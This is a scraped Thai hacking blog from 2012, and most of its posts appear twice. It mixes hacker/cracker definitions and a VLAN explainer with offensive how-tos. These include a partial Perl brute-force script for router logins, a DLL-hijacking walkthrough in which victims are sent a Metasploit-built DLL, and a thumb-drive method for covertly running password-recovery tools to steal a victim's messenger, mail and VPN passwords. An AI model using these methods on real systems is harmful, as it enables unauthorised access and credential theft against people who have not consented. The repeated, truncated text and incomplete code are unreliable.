ไหนๆก็ช่วงงานสัปดาห์หนังสือพอดี ขอโปรโมตหน่อยละกันครับ :)
รายละเอียดหนังสือ
http://naiin.com/pro.../23792/Hacking-
วันศุกร์ที่ 30 มีนาคม พ.ศ. 2555
วันพุธที่ 28 มีนาคม พ.ศ. 2555
Hacker และ Cracker ต่างกันยังไง
เชื่อว่าหลายๆคนในที่นี้คงจะคุ้นเคยกับบุคคลทั้งสองประเภทดังคำกล่าวข้างต้นมาแล้วบ้างนะครับ แม้จะยังไม่เข้าใจความหมายแน่ชัดนักว่าทั้งสองคำนี้เหมือนหรือแตกต่างกันอย่างไร วันนี้เราจะได้มาพูดถึงเรื่องนี้กัน ส่วนใครที่เป็นเซียนคอมพิวเตอร์และยังทำตัวเป็น Hacker หรือว่า Cracker กันอยู่ บทความตรงนี้ก็น่าสนใจมากสำหรับคุณเลยทีเดียว เอาล่ะครับเราจะมาดูกันต่อไป
ความหมายของ Hacker และ Cracker
เนื่องจากยังไม่มีนิยามศัพท์ตามกฎหมายที่จะบอกความหมายของคำว่า Hacker
และ Cracker ได้จึงต้องดูจากความหมายโดยทั่วไปที่ใช้ในวงการคอมพิวเตอร์ ในที่นี้มีความหมายของ Phracker เข้ามาด้วย (เพิ่งเคยได้ยินเหมือนกันครับ คำนี้)
- Hacker is and individual who is a greedly computer-savvy
enthusiast, capable of manipulating a remote computer.
- Phracker , a term given to "Phone Freaks", who have and use the
knowledge to make unauthorized long distance phone calls using a variety of methods such as card, codes , and tones.
- Cracker is a breed of both hacker and phracker , with the skill
to break the access codes to sensitive corporate, and government networks.
( See " Hacker, Phracker,and Cracker" by J.R. Minor : http://www.ols.net/user/iz/mitnk.htm )
ความหมายของ Hacker และ Cracker
เนื่องจากยังไม่มีนิยามศัพท์ตามกฎหมายที่จะบอกความหมายของคำว่า Hacker
และ Cracker ได้จึงต้องดูจากความหมายโดยทั่วไปที่ใช้ในวงการคอมพิวเตอร์ ในที่นี้มีความหมายของ Phracker เข้ามาด้วย (เพิ่งเคยได้ยินเหมือนกันครับ คำนี้)
- Hacker is and individual who is a greedly computer-savvy
enthusiast, capable of manipulating a remote computer.
- Phracker , a term given to "Phone Freaks", who have and use the
knowledge to make unauthorized long distance phone calls using a variety of methods such as card, codes , and tones.
- Cracker is a breed of both hacker and phracker , with the skill
to break the access codes to sensitive corporate, and government networks.
( See " Hacker, Phracker,and Cracker" by J.R. Minor : http://www.ols.net/user/iz/mitnk.htm )
วันจันทร์ที่ 19 มีนาคม พ.ศ. 2555
มาCrack พาสเวิร์ดของ Router กันบ้าง
นี่Code Perl
#!/usr/bin/perl
print "*****************************************
_____________________
< Brute Authentication >
---------------------
| ,__,
| (oo)____
(__) )\
||--|| * \n";
print "* code by windows98SE *\n";
print "*****************************************\n";
use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
print "IP:";
chomp( my $target = <STDIN> );
my @userlist = readFile("user.txt");
my @passlist = readFile("pass.txt");
my $outfile = 'PW.txt';
my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");
print "*****************************************
_____________________
< Brute Authentication >
---------------------
| ,__,
| (oo)____
(__) )\
||--|| * \n";
print "* code by windows98SE *\n";
print "*****************************************\n";
use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
print "IP:";
chomp( my $target = <STDIN> );
my @userlist = readFile("user.txt");
my @passlist = readFile("pass.txt");
my $outfile = 'PW.txt';
my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");
เทคนิคการซ่อนตัวในวง LAN และ wireless ไม่ให้รู้ว่าเราเป็นใคร(หากซ้ำ ขอโทษด้วย)
เทคนิคการซ่อนตัว(hide)ในวง LAN และ wireless ไม่ให้รู้ว่าเราเป็นใคร ! สำหรับคนที่ไม่อยากแสดงตัว ต่อ โปรแกรม scan ต่างๆ
1. ไปที่ start > Run พิมพ์ cmd แล้ว Enter
2. ในหน้าต่าง dos ให้ทำดังนี้ครับ
ถ้าอยาก hide พิมพ์คำว่า net config server /hidden:yes แล้ว Enter
ถ้าไม่อยาก hide พิมพ์คำว่า net config server /hidden:n แล้ว Enter
เท่านี้เราก็จะไม่แสดงตัวตนที่แท้จริงในระดับนึงครับ !
ขอบคุงครับ เครดิต nairong
:)
ข้อมูลจาก ruk-com.in.th
1. ไปที่ start > Run พิมพ์ cmd แล้ว Enter
2. ในหน้าต่าง dos ให้ทำดังนี้ครับ
ถ้าอยาก hide พิมพ์คำว่า net config server /hidden:yes แล้ว Enter
ถ้าไม่อยาก hide พิมพ์คำว่า net config server /hidden:n แล้ว Enter
เท่านี้เราก็จะไม่แสดงตัวตนที่แท้จริงในระดับนึงครับ !
ขอบคุงครับ เครดิต nairong
:)
ข้อมูลจาก ruk-com.in.th
ทำงานผ่านเน็ต อาทิตย์ละ 3000 - 5000 บาท/สัปดาห์ สนใจรายละเอียดคลิก!!
เปิดรับสมัคร นิสิตนักศึกษา ปิดภาคเรียน และบุคคลทั่วไป ทำงานพิเศษเพิ่มรายได้เสริมTHE FIRST POWER SYSTEM
เป็นบริษัทที่จัดทำสื่อโฆษณาโดยสื่อโฆษณาที่ใช้จะเป็นสื่อออนไลน์บนหน้าอินเทอร์เน็ตทั้งหมด เพื่อใช้ในการโปรโมทสื่อโฆษณาผ๋านเว็ปไซต์ โดยสื่อโฆษณาที่ใช้จะมีอยู่หลายรูปแบบด้วยกัน
ผู้ที่สนใจสามารถเลือกทำได้ทั้งแบบ Part time และ Full time สามารถเลือกเวลาทำงานได้
ด่วนรับจำนวนจำกัด !!!
คุณสมบัติ
- ชาย/หญิง อายุ 18 ปี ขึ้นไป
- ไม่จำเป็นต้องมีประสบการณ์ทำงาน ( เพราะมีระบบสอนงานให้ )
- สามารถใช้คอมพิวเตอร์ และ Internet ได้
- ยินดีรับนักศึกษาที่อยากหารายได้เสริม หรือคนทำงานประจำ
- เปิดรับทั้งในรูปแบบ งาน Part time และ full time
เพียงคุณพร้อมที่จะเรียนรู้ระบบและทำงานกับเรา เพียงเท่านั้นคุณก็สามารถทำธุรกิจของตัวเองได้ ทางบริษัทจะมีทีมงานสนับสนุนคุณ
**** สมัครงาน หรือรับข้อมูลเพิ่มเติม ****
เบอร์โทร 088-1874277 (นิล),
CLICK และกรอกข้อมูลตรงนี้
http://www.thefirst-one.com/clients/home/032415
(ถ้ากรอกข้อมูลไม่ได้ copy http://www.thefirst-one.com/clients/home/032415 วางลงในช่อง URL นะคับ)
ข้อมูลจาก ruk-com.in.th
วันเสาร์ที่ 17 มีนาคม พ.ศ. 2555
VLAN INTRODUCTION, เดี่ยวนี้การทำตัวเป็นSniffer ลำบาก ใคอยากเป็นก็ควรรู้เรื่องนี
พอดี ผมลองหา โปรแกรม แสกนต่างๆ โปรแกรมดัก โปรแกรมที่ใช้ในการ hackต่างๆ มาใช้ ปรากฏว่า ใช้ไม่ได้ ก็เลยพยายามหาสาเหตุตั้งนาน
ก็พบว่ามันเป็นอย่างนี้นี่เอง
ไม่พูดมากเอาไปเลยละกัน
VLAN คืออะไร
VLAN ย่อมาจาก Virtual LAN เป็นเทคโนโลยีที่ใช้ในการจำลองสร้างเครือข่าย LAN แต่ไม่ขึ้นอยู่กับการต่อทางกายภาพเช่น สวิตช์หนึ่งตัวสามารถใช้จำลองเครือข่าย LAN ได้ห้าเครือข่าย หรือสามารถใช้สวิตช์สามตัวจำลองเครือข่าย LAN เพียงหนึ่งเครือข่าย เป็นต้น
ในการสร้าง VLAN โดยใช้อุปกรณ์เครือข่ายหลายตัว จะมีพอร์ตที่ทำหน้าที่เชื่อมต่อระหว่างอุปกรณ์เครือข่ายแต่ละตัว เรียก Trunk port ซึ่งเสมือนมีท่อเชื่อม หรือ Trunk เป็นตัวเชื่อมด้วย
เนื่อง จาก VLAN เป็น LAN แบบจำลอง ถึงแม้ว่าจะต่อทางกายภาพอยู่บนอุปกรณ์เครือข่ายตัวเดียวกัน แต่การติดต่อกันนั้นจำเป็นต้องใช้อุปกรณ์ที่มีความสามารถในการค้นหาเส้นทาง เช่น เราเตอร์ หรือสวิตช์เลเยอร์สาม
ลักษณะพิเศษของ VLAN ทั่วๆ ไปคือ
1. VLAN แต่ละเครือข่ายที่ติดต่อกันนั้น จะมีลักษณะเหมือนกับต่อแยกกันด้วยบริดจ์
2. VLAN สามารถต่อข้ามสวิตช์หลายตัวได้
3. ท่อเชื่อม (Trunks) ต่างๆ จะรองรับทราฟฟิกที่คับคั่งของแต่ละ VLAN ได้
ชนิดของ VLAN
1. Layer 1 VLAN : Membership by ports
ใน การแบ่ง VLAN จะใช้พอร์ตบอกว่าเป็นของ VLAN ใด เช่นสมมุติว่าในสวิตช์ที่มี 4 พอร์ต กำหนดให้ พอร์ต 1, 2 และ 4 เป็นของ VLAN เบอร์ 1 และพอร์ตที่ 3 เป็นของ VLAN เบอร์ 2 ดังรูปที่ 1
Port
VLAN
1
1
2
1
3
2
4
1
รูปที่ 1 แสดงการกำหนดพอร์ตให้กับ VLAN
ก็พบว่ามันเป็นอย่างนี้นี่เอง
ไม่พูดมากเอาไปเลยละกัน
VLAN คืออะไร
VLAN ย่อมาจาก Virtual LAN เป็นเทคโนโลยีที่ใช้ในการจำลองสร้างเครือข่าย LAN แต่ไม่ขึ้นอยู่กับการต่อทางกายภาพเช่น สวิตช์หนึ่งตัวสามารถใช้จำลองเครือข่าย LAN ได้ห้าเครือข่าย หรือสามารถใช้สวิตช์สามตัวจำลองเครือข่าย LAN เพียงหนึ่งเครือข่าย เป็นต้น
ในการสร้าง VLAN โดยใช้อุปกรณ์เครือข่ายหลายตัว จะมีพอร์ตที่ทำหน้าที่เชื่อมต่อระหว่างอุปกรณ์เครือข่ายแต่ละตัว เรียก Trunk port ซึ่งเสมือนมีท่อเชื่อม หรือ Trunk เป็นตัวเชื่อมด้วย
เนื่อง จาก VLAN เป็น LAN แบบจำลอง ถึงแม้ว่าจะต่อทางกายภาพอยู่บนอุปกรณ์เครือข่ายตัวเดียวกัน แต่การติดต่อกันนั้นจำเป็นต้องใช้อุปกรณ์ที่มีความสามารถในการค้นหาเส้นทาง เช่น เราเตอร์ หรือสวิตช์เลเยอร์สาม
ลักษณะพิเศษของ VLAN ทั่วๆ ไปคือ
1. VLAN แต่ละเครือข่ายที่ติดต่อกันนั้น จะมีลักษณะเหมือนกับต่อแยกกันด้วยบริดจ์
2. VLAN สามารถต่อข้ามสวิตช์หลายตัวได้
3. ท่อเชื่อม (Trunks) ต่างๆ จะรองรับทราฟฟิกที่คับคั่งของแต่ละ VLAN ได้
ชนิดของ VLAN
1. Layer 1 VLAN : Membership by ports
ใน การแบ่ง VLAN จะใช้พอร์ตบอกว่าเป็นของ VLAN ใด เช่นสมมุติว่าในสวิตช์ที่มี 4 พอร์ต กำหนดให้ พอร์ต 1, 2 และ 4 เป็นของ VLAN เบอร์ 1 และพอร์ตที่ 3 เป็นของ VLAN เบอร์ 2 ดังรูปที่ 1
Port
VLAN
1
1
2
1
3
2
4
1
รูปที่ 1 แสดงการกำหนดพอร์ตให้กับ VLAN
HackTheGame (ทดสอบความสามารถ)
นี้เป็นเกมนะครับ แต่ก็สามารถนำไปประยุกค์ใช้ได้ เกมนี้อาจยากไปสพหรับมือใหม่ คนที่จะเล่นก็ต้องมีพื้นฐาน
มีความรู้ด้าน DOS พอสมควร เพราะเกมนี้ต้องใช้คำสั่ง DOS ในการเล่นครับ สำหรับคนที่ไม่มีพื้นฐาน
ก็เล่นได้นะแต่อาจจะงงสักหน่อย พิมพ์ อาจไปหัดเล่นเกม Hacker Evolution แล้วค่อยมาเล่นเกมนี้ก็ได้ครับ
รูปร่างหน้าตาเกมก็เป็นประมาณนี้ครับ
ปล.กำลังลบขยะในคอมดันเห็นตั้งอยู่นึกว่าหายไปละเลยเอามาให้ลองเล่นกัน
Nothing for guest!
ข้อมูลจาก ruk-com.in.th
มีความรู้ด้าน DOS พอสมควร เพราะเกมนี้ต้องใช้คำสั่ง DOS ในการเล่นครับ สำหรับคนที่ไม่มีพื้นฐาน
ก็เล่นได้นะแต่อาจจะงงสักหน่อย พิมพ์ อาจไปหัดเล่นเกม Hacker Evolution แล้วค่อยมาเล่นเกมนี้ก็ได้ครับ
รูปร่างหน้าตาเกมก็เป็นประมาณนี้ครับ
ปล.กำลังลบขยะในคอมดันเห็นตั้งอยู่นึกว่าหายไปละเลยเอามาให้ลองเล่นกัน
Nothing for guest!
ข้อมูลจาก ruk-com.in.th
วันพฤหัสบดีที่ 15 มีนาคม พ.ศ. 2555
DLL Hijacking สอดไส้โค๊ดร้ายลง DLL แอนติหาไม่พบ !?
DLL Hijacking ไทยเวอร์ชั่น
เขียนโดย Pe3z
ผมขอออกตัวตามสเต็ปก่อนเลยนะครับว่า ผมไม่ได้เก่งกาจอะไร แค่อัพเดทข่าวของเขาแล้วมาแปลเท่านั้นเองครับ ตกหล่นอะไรก็สามารถคอมเม้นบอกกันได้ทันทีนะครับ
สำหรับเรื่องที่จะมาบล๊อกวันนี้คือ DLL Hijacking ซึ่งเป็นช่องโหว่การโจมตีแบบใหม่ครับ ค้นพบโดย HD Moore http://digitaloffense.net/ ซึ่งเป็นหนึ่งใน Developers ของ Metaspolit และอีกหลายโปรแกรมดัง ๆ ครับ
โดย DLL Hijacking ใช้หลักการคือ การสร้าง DLL Files โดยแทรกคำสั่งอันตรายเข้าไป ซึ่งโดยปกติแล้ว โปรแกรมทั่วไปมักจะใช้ DLL ในการรวมเข้ามาทำงาน เพื่อให้โปรแกรมสามารถทำงานได้อย่างสมบูรณ์ ดังนั้นจึงมีความเสี่ยงสูงในทุก ๆ โปรแกรมที่ใช้ DLL Files อาจโดนสอดไส้คำสั่งได้
วิธีหลักของการ DLL Hijacking ยังคงใช้แนวเดิมกับโทรจันอยู่ โดยจะทำการอัพโหลด DLL Files และจูงใจให้เหยื่อมีการดาวโหลด และเรียกใช้งาน และนับเป็นการยากที่จะป้องกัน ถึงแม้โปรแกรมป้องกันในประเภทแอนติไวรัส ก็คงยังไม่สามารถป้องกันได้ในเร็ว ๆ นี้ เนื่องจากตัวโครงสร้าง DLL Files ของแต่ละโปรแกรมแตกต่างกัน ทำให้ตัวแอนติไวรัส ยังไม่สามารถระบุเจาะจงไปยังเป้าหมายได้
การสร้าง Malicious DLL Files สามารถทำได้โดยผ่าน Metaspolit Framework โดยทาง Metaspolit ได้มีชุดคำสั่งเตรียมเอาไว้แล้วในการ hijack เข้าไปในโปรแกรมต่าง ๆ
SBKElshsvlk
สุดท้ายเพียงแค่ส่งให้เหยื่อคลิก เราก็สามารถควบคุมผ่าน console ได้ทันทีครับ
การป้องกันเบื้องต้นคือการไม่คลิกลิ้งค์ต่าง ๆ ที่ตัวเองไม่ได้สั่งมา ลิ้งค์แปลก ๆ ที่เกิดขึ้นโดยไม่รู้สาเหตุครับผม
เขียนโดย Pe3z
ผมขอออกตัวตามสเต็ปก่อนเลยนะครับว่า ผมไม่ได้เก่งกาจอะไร แค่อัพเดทข่าวของเขาแล้วมาแปลเท่านั้นเองครับ ตกหล่นอะไรก็สามารถคอมเม้นบอกกันได้ทันทีนะครับ
สำหรับเรื่องที่จะมาบล๊อกวันนี้คือ DLL Hijacking ซึ่งเป็นช่องโหว่การโจมตีแบบใหม่ครับ ค้นพบโดย HD Moore http://digitaloffense.net/ ซึ่งเป็นหนึ่งใน Developers ของ Metaspolit และอีกหลายโปรแกรมดัง ๆ ครับ
โดย DLL Hijacking ใช้หลักการคือ การสร้าง DLL Files โดยแทรกคำสั่งอันตรายเข้าไป ซึ่งโดยปกติแล้ว โปรแกรมทั่วไปมักจะใช้ DLL ในการรวมเข้ามาทำงาน เพื่อให้โปรแกรมสามารถทำงานได้อย่างสมบูรณ์ ดังนั้นจึงมีความเสี่ยงสูงในทุก ๆ โปรแกรมที่ใช้ DLL Files อาจโดนสอดไส้คำสั่งได้
วิธีหลักของการ DLL Hijacking ยังคงใช้แนวเดิมกับโทรจันอยู่ โดยจะทำการอัพโหลด DLL Files และจูงใจให้เหยื่อมีการดาวโหลด และเรียกใช้งาน และนับเป็นการยากที่จะป้องกัน ถึงแม้โปรแกรมป้องกันในประเภทแอนติไวรัส ก็คงยังไม่สามารถป้องกันได้ในเร็ว ๆ นี้ เนื่องจากตัวโครงสร้าง DLL Files ของแต่ละโปรแกรมแตกต่างกัน ทำให้ตัวแอนติไวรัส ยังไม่สามารถระบุเจาะจงไปยังเป้าหมายได้
การสร้าง Malicious DLL Files สามารถทำได้โดยผ่าน Metaspolit Framework โดยทาง Metaspolit ได้มีชุดคำสั่งเตรียมเอาไว้แล้วในการ hijack เข้าไปในโปรแกรมต่าง ๆ
SBKElshsvlk
สุดท้ายเพียงแค่ส่งให้เหยื่อคลิก เราก็สามารถควบคุมผ่าน console ได้ทันทีครับ
การป้องกันเบื้องต้นคือการไม่คลิกลิ้งค์ต่าง ๆ ที่ตัวเองไม่ได้สั่งมา ลิ้งค์แปลก ๆ ที่เกิดขึ้นโดยไม่รู้สาเหตุครับผม
วันพุธที่ 14 มีนาคม พ.ศ. 2555
การสะกดรอยและทำลายอีเมล์
การสะกดรอยและทำลายอีเมล์
อยากรู้มะว่าอีเมลที่เราใช้กันเนี้ยไปถึงผู้รับไหม
แล้วมันได้อ่านหรือยัง
ตอนนี้มีวิธีตอบสอบให้แล้วนะครับไม่ยาก
โดยทำตามขั้นตอนต่อไปนี้
1.เข้าไปที่เว็บไซต์ www.readnotify.com
2.ที่ช่องYour existing email addressให้ใส่ชื่ออีเมลเราลงไป
3.คลิกปุ่มGo
4.ใส่อีเมลเราอีกทีที่ช่องMain EMAIL
5.ตั้งpasswordใหม่อีกที
6.กรอกข้อมูลส่วนตัวให้ครบพร้อมคำถามฉุกเฉินลงไป
7.คลิกเลือกช่องTerms and Corditions
8.คลิกปุ่มSign Up
9.จะปรากฏข้อความWelcome to Readnotify
10.ต่อจากนั้นเวลาส่งเมล์ถ้าเราอยากรู้ว่าเขาอ่านเมล์ยังให้พิมพ์ .readnotify.com ต่อท้ายลงไป
เช่น buffalo@hotmail.com.readnotify.com
11.ตรวจสอบปลายทางโดยเข้าไปที่เว็บไซต์www.readnotify.comอีกทีนึง
12.ล็อกอินเข้าไปโดยใช้ชื่อเรา
13.readnotifyจะรายงานผลให้ทราบว่าได้อ่านยังโดย
14.ดูช่องสถานะOpendd
15.not yet ยังไม่ได้อ่าน Openedอ่านแล้ว
16.อันนี้เด็ดที่สุดถ้าต้องการให้ทำลายอีเมลที่ส่งไป
ภายใน60วิหลังจากอ่าน(คนอ่านคงงงน่าดู)โดย
17.ให้เพิมพ์ .selfdestructing ต่อท้ายเช่น
buffalo@hotmail.com.selfdestructing.readnotify.com
ปล.การสอนนี้เพื่อการศึกษาเท่านั้นไม่ได้มีเจตนาร้ายใดใด้ทั้งสิ้น
by visor แห่ง Zc Club
ข้อมูลจาก ruk-com.in.th
อยากรู้มะว่าอีเมลที่เราใช้กันเนี้ยไปถึงผู้รับไหม
แล้วมันได้อ่านหรือยัง
ตอนนี้มีวิธีตอบสอบให้แล้วนะครับไม่ยาก
โดยทำตามขั้นตอนต่อไปนี้
1.เข้าไปที่เว็บไซต์ www.readnotify.com
2.ที่ช่องYour existing email addressให้ใส่ชื่ออีเมลเราลงไป
3.คลิกปุ่มGo
4.ใส่อีเมลเราอีกทีที่ช่องMain EMAIL
5.ตั้งpasswordใหม่อีกที
6.กรอกข้อมูลส่วนตัวให้ครบพร้อมคำถามฉุกเฉินลงไป
7.คลิกเลือกช่องTerms and Corditions
8.คลิกปุ่มSign Up
9.จะปรากฏข้อความWelcome to Readnotify
10.ต่อจากนั้นเวลาส่งเมล์ถ้าเราอยากรู้ว่าเขาอ่านเมล์ยังให้พิมพ์ .readnotify.com ต่อท้ายลงไป
เช่น buffalo@hotmail.com.readnotify.com
11.ตรวจสอบปลายทางโดยเข้าไปที่เว็บไซต์www.readnotify.comอีกทีนึง
12.ล็อกอินเข้าไปโดยใช้ชื่อเรา
13.readnotifyจะรายงานผลให้ทราบว่าได้อ่านยังโดย
14.ดูช่องสถานะOpendd
15.not yet ยังไม่ได้อ่าน Openedอ่านแล้ว
16.อันนี้เด็ดที่สุดถ้าต้องการให้ทำลายอีเมลที่ส่งไป
ภายใน60วิหลังจากอ่าน(คนอ่านคงงงน่าดู)โดย
17.ให้เพิมพ์ .selfdestructing ต่อท้ายเช่น
buffalo@hotmail.com.selfdestructing.readnotify.com
ปล.การสอนนี้เพื่อการศึกษาเท่านั้นไม่ได้มีเจตนาร้ายใดใด้ทั้งสิ้น
by visor แห่ง Zc Club
ข้อมูลจาก ruk-com.in.th
มาเลือกทางเดินกันก่อนครับ
Hacker กับหมวกสองใบที่ต้องเลือก
hackerแฮกเกอร์ความหมายเดิมจะหมายถึงนักโปรแกรมที่มีความสนใจหรือความเชี่ยวชาญอย่างลึกซึ้งในระบบคอมพิวเตอร์ถ้าเป็นนักโปรแกรมทั่วไปก็จะสนใจเพียงแค่ว่าทำโปรแกรมให้เสร็จและใช้งานได้ตามต้องการเท่านั้นแต่พวกแฮกเกอร์จะชอบคิดค้นหาวิธีการแปลกๆใหม่ๆ เพื่อให้โปรแกรมทำงานด้วยประสิทธิภาพสูงสุด หรือชอบแก้ไขปัญหาที่ซับซ้อนยุ่งยาก เป็นโปรแกรมเมอร์ที่หมกมุ่นอยู่กับการปรับปรุงโปรแกรมให้ทำงานได้ดีขึ้น ซึ่งหมายรวมถึงผู้เชี่ยวชาญทางด้านโปรแกรมด้วย
cracker แคร็กเกอร์คือผู้ที่หาทางเจาะเข้าสู่ระบบคอมพิวเตอร์ต่างๆโดยไม่ได้รับอนุญาต อาจจะเพื่อความสนุก หรือเพื่อการโจรกรรมและทำลายข้อมูลเป็นคำที่ใช้แทนคำว่า แฮกเกอร์ เพื่อให้คำว่าแฮกเกอร์ยังคงความหมายเดิมว่าเป็นผู้ที่เชี่ยวชาญด้านโปรแกรม และแก้ปัญหาคอมพิวเตอร์ได้เก่ง
แต่ในปัจจุบันนิยม ใช้คำว่าแฮกเกอร์ในความหมายว่าเป็นผู้ที่พยายาม ทำลายการรักษาความปลอดภัย ในระบบคอมพิวเตอร์และเพื่อป้องกันความสับสนเมื่อผู้อ่านต้องไปอ่านเรื่องราว ของแฮกเกอร์ในบทความเรื่องอื่นๆ ผู้เขียนจึงขอใช้คำว่าแฮกเกอร์ในความหมายดังกล่าวนี้
- แฮกเกอร์หมวกดำ (black hat hacker) /แครกเกอร์(Cracker) จัดว่าเป็นแฮกเกอร์ฝ่ายอธรรม นิยมใช้ความสามารถเฉพาะตัวไปในทางที่ผิด มีเจตนามุ่งร้าย ทำให้เกิดปัญหาในระบบคอมพิวเตอร์เป็นแฮกเกอร์ที่เจาะระบบอย่างผิดกฎหมายและสร้างความเสียหายให้เกิดขึ้นใน ระบบข้อมูลคอมพิวเตอร์ ซึ่งแฮกเกอร์ในกลุ่มนี้เป็นกลุ่มที่สร้างความยุ่งยากให้แก่ผู้ที่ดูแลความ ปลอดภัยของระบบคอมพิวเตอร์เป็นอย่างยิ่ง
hackerแฮกเกอร์ความหมายเดิมจะหมายถึงนักโปรแกรมที่มีความสนใจหรือความเชี่ยวชาญอย่างลึกซึ้งในระบบคอมพิวเตอร์ถ้าเป็นนักโปรแกรมทั่วไปก็จะสนใจเพียงแค่ว่าทำโปรแกรมให้เสร็จและใช้งานได้ตามต้องการเท่านั้นแต่พวกแฮกเกอร์จะชอบคิดค้นหาวิธีการแปลกๆใหม่ๆ เพื่อให้โปรแกรมทำงานด้วยประสิทธิภาพสูงสุด หรือชอบแก้ไขปัญหาที่ซับซ้อนยุ่งยาก เป็นโปรแกรมเมอร์ที่หมกมุ่นอยู่กับการปรับปรุงโปรแกรมให้ทำงานได้ดีขึ้น ซึ่งหมายรวมถึงผู้เชี่ยวชาญทางด้านโปรแกรมด้วย
cracker แคร็กเกอร์คือผู้ที่หาทางเจาะเข้าสู่ระบบคอมพิวเตอร์ต่างๆโดยไม่ได้รับอนุญาต อาจจะเพื่อความสนุก หรือเพื่อการโจรกรรมและทำลายข้อมูลเป็นคำที่ใช้แทนคำว่า แฮกเกอร์ เพื่อให้คำว่าแฮกเกอร์ยังคงความหมายเดิมว่าเป็นผู้ที่เชี่ยวชาญด้านโปรแกรม และแก้ปัญหาคอมพิวเตอร์ได้เก่ง
แต่ในปัจจุบันนิยม ใช้คำว่าแฮกเกอร์ในความหมายว่าเป็นผู้ที่พยายาม ทำลายการรักษาความปลอดภัย ในระบบคอมพิวเตอร์และเพื่อป้องกันความสับสนเมื่อผู้อ่านต้องไปอ่านเรื่องราว ของแฮกเกอร์ในบทความเรื่องอื่นๆ ผู้เขียนจึงขอใช้คำว่าแฮกเกอร์ในความหมายดังกล่าวนี้
- แฮกเกอร์หมวกดำ (black hat hacker) /แครกเกอร์(Cracker) จัดว่าเป็นแฮกเกอร์ฝ่ายอธรรม นิยมใช้ความสามารถเฉพาะตัวไปในทางที่ผิด มีเจตนามุ่งร้าย ทำให้เกิดปัญหาในระบบคอมพิวเตอร์เป็นแฮกเกอร์ที่เจาะระบบอย่างผิดกฎหมายและสร้างความเสียหายให้เกิดขึ้นใน ระบบข้อมูลคอมพิวเตอร์ ซึ่งแฮกเกอร์ในกลุ่มนี้เป็นกลุ่มที่สร้างความยุ่งยากให้แก่ผู้ที่ดูแลความ ปลอดภัยของระบบคอมพิวเตอร์เป็นอย่างยิ่ง
วันเสาร์ที่ 10 มีนาคม พ.ศ. 2555
ตำนาน Hacker (เผื่อคนม่ะรู้นะคับ)
8) 8) 8)
Credit
คัมภีร์สยบแฮกเกอร์ (#4)
http://www.pantip.com/tech/internet/topic/IT1062643.html
Credit
คัมภีร์สยบแฮกเกอร์ (#4)
http://www.pantip.com/tech/internet/topic/IT1062643.html
ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์
ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์
ก่อนตั้งคำถาม!!!!!
ก่อนถามปัญหาทางเทคนิคผ่านทาง shout box หรือใน webboard หรือ ใน ห้องchat แนะให้ทำสิ่งต่อไปนี้ก่อน
1. หาคำตอบจากกระทู้ในบอร์ดนั้นๆก่อน
2. ไปค้นในเว็บทั่วไปเสียก่อน
3. พยายามอ่าน กฏ หรืออะไรก็ตามที่เขาแนะนำให้อ่าน
4. ไปหาอ่านใน FAQ (ปัญหาที่เจอบ่อย)
5. ลองตรวจดู หรือ ทำการทดลองเองก่อน
6. หากคุณเป็น programmer ลองพยายามศึกษา source code เองดูก่อน
7. กลับไปอ่านข้อ 1 ใหม่
ระหว่างการถามคำถาม ให้แสดงว่าคุณได้พยายามทำด้วยตัวเองแล้ว เพราะมันจะช่วยให้คุณไม่ใช่ตัวขี้เกียจที่รอแต่คนมาป้อนให้และไม่เป็นการเสียเวลาสำห
รับ ผู้ที่จะช่วยให้คำตอบคุณ จะให้ดีกว่านั้น คุณควรนำเสนอสิ่งที่คุณได้ ศึกษา มาก่อนหน้านี้ เพราะเราชอบจะตอบคำถามกับคนที่แสดงให้เห็นว่าพวกเขาสามารถเรียนรู้จากคำตอบ ได้
วันศุกร์ที่ 9 มีนาคม พ.ศ. 2555
Hack&Programing&Virus&Tip esn....
อันนี้คือแทบหมดหัวเลย :( :(
Hack
การแฮกผ่าน Thum Drive :o
บทนี้จะเป็ฯการแฮกผ่าน thum drive หรือ แฮกโดยติดตั่งโปรแกรามลงเรื่องเหยื่อ (ได้ผมระยะยาว) เหมากับมือใหม่หัดแฮค
โปรแกรมที่แนะนำต่อไปนี้มี MessenPass แกะรหัสผ่าน ของ Msn Yahoo ICQ เป็นต้น
Mail Pass view แกะรหัสผ่านของเว็บเบสอย่าง Hotmail Yahoo และโปรแกรม outlook Express
Protected Stprage Pass view แกะรหัสที่เก็บไว้ในเครื่อง PC เช่น Msn Express เป็นต้น
Dialupass แกะรหัส ของ Dial-up,RAS,VPN
จากที่ตรวจดูแล้ว โปรแกรมเหล่านี้ไม่ใช่ spyware หรือ Trojan แต่ก้ยังหวั่นเพราะ โปรแกรมพวกนี้แจกฟรี ต้องเสี่ยงใช้งานเอง ไม่รับผิดชอบเมื่อมีปัญหาเกิดขึ้น
ปัญหาที่1 ??? เราจะลงเข้าเครื่องเจ้าบอยตรงๆได้เรื่องแน่ เพราะ วินโดว์ของโปรแกรมแสดงออกมา เมื่อเข้าไปอ่านรายละเอียดพบว่าทั่ง4โปรแปรมแกรม สามารถเรียกผ่าน คอมมานไลด์ได้ ซึ่งการรันลักษณะนี้วินโดว์จะไม่แสดงออกมา
Hack
การแฮกผ่าน Thum Drive :o
บทนี้จะเป็ฯการแฮกผ่าน thum drive หรือ แฮกโดยติดตั่งโปรแกรามลงเรื่องเหยื่อ (ได้ผมระยะยาว) เหมากับมือใหม่หัดแฮค
โปรแกรมที่แนะนำต่อไปนี้มี MessenPass แกะรหัสผ่าน ของ Msn Yahoo ICQ เป็นต้น
Mail Pass view แกะรหัสผ่านของเว็บเบสอย่าง Hotmail Yahoo และโปรแกรม outlook Express
Protected Stprage Pass view แกะรหัสที่เก็บไว้ในเครื่อง PC เช่น Msn Express เป็นต้น
Dialupass แกะรหัส ของ Dial-up,RAS,VPN
จากที่ตรวจดูแล้ว โปรแกรมเหล่านี้ไม่ใช่ spyware หรือ Trojan แต่ก้ยังหวั่นเพราะ โปรแกรมพวกนี้แจกฟรี ต้องเสี่ยงใช้งานเอง ไม่รับผิดชอบเมื่อมีปัญหาเกิดขึ้น
